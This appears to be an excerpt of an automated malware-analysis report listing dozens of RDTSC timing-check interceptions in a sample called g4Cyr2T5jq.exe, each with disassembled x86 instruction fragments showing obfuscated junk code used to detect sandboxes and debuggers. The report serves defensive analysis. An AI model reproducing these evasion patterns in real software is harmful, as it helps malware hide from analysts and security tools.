Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DFA2A second address: 6DFAA6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F772874F638h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 76DECBA7h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F772874F638h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dh, 82h 0x0000002f lea ebx, dword ptr [ebp+124647D5h] 0x00000035 xchg eax, ebx 0x00000036 jno 00007F772874F65Ah 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 push ecx 0x00000041 pop ecx 0x00000042 jmp 00007F772874F63Ah 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DFB42 second address: 6DFB48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DFB48 second address: 6DFB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DFB4C second address: 6DFB7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E595Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e movsx esi, bx 0x00000011 push 00000000h 0x00000013 sbb esi, 6D4C408Dh 0x00000019 push F8E241C1h 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F77291E595Dh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DFB7E second address: 6DFB88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F772874F636h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DFB88 second address: 6DFB8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DFC73 second address: 6DFCF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F772874F646h 0x0000000e push 00000000h 0x00000010 or dword ptr [ebp+122D260Bh], eax 0x00000016 mov esi, 14BAA0A4h 0x0000001b push 0ECD7C01h 0x00000020 pushad 0x00000021 jmp 00007F772874F643h 0x00000026 jmp 00007F772874F63Bh 0x0000002b popad 0x0000002c xor dword ptr [esp], 0ECD7C81h 0x00000033 mov esi, edx 0x00000035 push 00000003h 0x00000037 push ecx 0x00000038 mov edi, dword ptr [ebp+122D2AF7h] 0x0000003e pop edx 0x0000003f push 00000000h 0x00000041 mov edx, dword ptr [ebp+122D2C27h] 0x00000047 push 00000003h 0x00000049 sub dword ptr [ebp+122D3112h], eax 0x0000004f push 615D1F40h 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6DFCF1 second address: 6DFD27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F77291E5958h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f add dword ptr [esp], 5EA2E0C0h 0x00000016 mov edx, dword ptr [ebp+122D3859h] 0x0000001c movzx esi, ax 0x0000001f lea ebx, dword ptr [ebp+124647E9h] 0x00000025 mov dl, D7h 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jnl 00007F77291E595Ch 0x00000030 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6CEA41 second address: 6CEA4B instructions: 0x00000000 rdtsc 0x00000002 jo 00007F772874F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FD370 second address: 6FD37E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F77291E595Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FD37E second address: 6FD388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FD388 second address: 6FD38C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FDCCF second address: 6FDCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FDF53 second address: 6FDF5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FE0B1 second address: 6FE0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FE0B5 second address: 6FE0DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F77291E595Bh 0x0000000e jmp 00007F77291E5965h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FE0DE second address: 6FE0E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FE0E4 second address: 6FE0E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FE270 second address: 6FE27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jne 00007F772874F642h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6F29F9 second address: 6F29FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6F29FF second address: 6F2A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F772874F63Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6F2A0B second address: 6F2A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6F2A0F second address: 6F2A14 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6F2A14 second address: 6F2A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E595Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 pushad 0x00000015 jns 00007F77291E5956h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6F2A3D second address: 6F2A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6F2A45 second address: 6F2A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6F2A49 second address: 6F2A65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F648h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6C1393 second address: 6C13A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E595Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6C13A5 second address: 6C13AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6C13AB second address: 6C13C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77291E5967h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FE41B second address: 6FE435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F772874F640h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FE435 second address: 6FE44C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F77291E5962h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FE44C second address: 6FE463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F772874F636h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jc 00007F772874F644h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FEBA0 second address: 6FEBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 jmp 00007F77291E5964h 0x0000000c jng 00007F77291E595Eh 0x00000012 jmp 00007F77291E5963h 0x00000017 jc 00007F77291E5962h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FED17 second address: 6FED2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jp 00007F772874F636h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FED2E second address: 6FED42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E595Fh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FED42 second address: 6FED6C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F772874F64Dh 0x00000008 pushad 0x00000009 jns 00007F772874F636h 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FEE9F second address: 6FEEC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F77291E5963h 0x0000000e jnl 00007F77291E5956h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 6FF1AE second address: 6FF1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70796B second address: 7079B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E5966h 0x00000009 push eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop ecx 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F77291E595Eh 0x0000001a pop ebx 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F77291E595Fh 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7079B5 second address: 7079D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F644h 0x00000007 jnc 00007F772874F636h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70B6BC second address: 70B6F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F77291E5968h 0x00000008 jo 00007F77291E5956h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F77291E5961h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70B3B1 second address: 70B3B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70B3B6 second address: 70B3BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70B3BC second address: 70B3C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70B3C0 second address: 70B3CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70B3CC second address: 70B3F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F772874F636h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F772874F641h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F772874F636h 0x0000001a jbe 00007F772874F636h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70B3F8 second address: 70B40A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F77291E595Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70E977 second address: 70E97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70E97C second address: 70E982 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70EB33 second address: 70EB3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edi 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70F6CC second address: 70F6D1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70FAAD second address: 70FAB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 70FAB3 second address: 70FAC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a pushad 0x0000000b jg 00007F77291E5956h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71002E second address: 710033 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 710033 second address: 7100BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77291E595Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D2A5Fh] 0x00000013 push 00000000h 0x00000015 movzx esi, dx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F77291E5958h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 0000001Dh 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 call 00007F77291E5963h 0x00000039 sub dword ptr [ebp+122D3043h], esi 0x0000003f pop esi 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 jmp 00007F77291E5963h 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007F77291E5962h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7100BB second address: 7100BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 710A01 second address: 710A05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 710A05 second address: 710A18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7119F2 second address: 7119F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 711221 second address: 71122F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F772874F63Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7119F6 second address: 711A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F77291E5966h 0x0000000b popad 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D2C47h] 0x00000013 mov si, 6992h 0x00000017 push 00000000h 0x00000019 mov edi, dword ptr [ebp+122D2CC3h] 0x0000001f push 00000000h 0x00000021 clc 0x00000022 xchg eax, ebx 0x00000023 push esi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 711A2F second address: 711A3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71244F second address: 712526 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F77291E5966h 0x00000008 jmp 00007F77291E595Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007F77291E5969h 0x00000016 nop 0x00000017 mov dword ptr [ebp+122D3047h], ebx 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F77291E5958h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000016h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 jmp 00007F77291E5968h 0x0000003e jg 00007F77291E5963h 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push edx 0x00000049 call 00007F77291E5958h 0x0000004e pop edx 0x0000004f mov dword ptr [esp+04h], edx 0x00000053 add dword ptr [esp+04h], 00000016h 0x0000005b inc edx 0x0000005c push edx 0x0000005d ret 0x0000005e pop edx 0x0000005f ret 0x00000060 call 00007F77291E5965h 0x00000065 mov dword ptr [ebp+122D21CAh], ecx 0x0000006b pop edi 0x0000006c xchg eax, ebx 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7121DD second address: 7121E7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F772874F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 712526 second address: 71252A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71452B second address: 71452F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 716F60 second address: 716F8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F77291E595Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F77291E5968h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7179AC second address: 7179B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 716F8D second address: 716F92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 717BD0 second address: 717BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 716F92 second address: 716F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 717BD5 second address: 717C57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F772874F636h 0x00000009 jmp 00007F772874F644h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 jp 00007F772874F63Ch 0x00000018 mov esi, dword ptr [ebp+122D2554h] 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push eax 0x00000023 call 00007F772874F638h 0x00000028 pop eax 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc eax 0x00000036 push eax 0x00000037 ret 0x00000038 pop eax 0x00000039 ret 0x0000003a mov edi, eax 0x0000003c mov dword ptr [ebp+12469DAAh], edi 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 jmp 00007F772874F63Bh 0x0000004a pop edi 0x0000004b xchg eax, ebx 0x0000004c je 00007F772874F655h 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F772874F647h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 7179B0 second address: 7179BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71AC14 second address: 71AC18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71BCD2 second address: 71BCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 js 00007F77291E5956h 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71BCE7 second address: 71BCEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\g4Cyr2T5jq.exe RDTSC instruction interceptor: First address: 71AD53 second address: 71AD67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F77291E5956h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
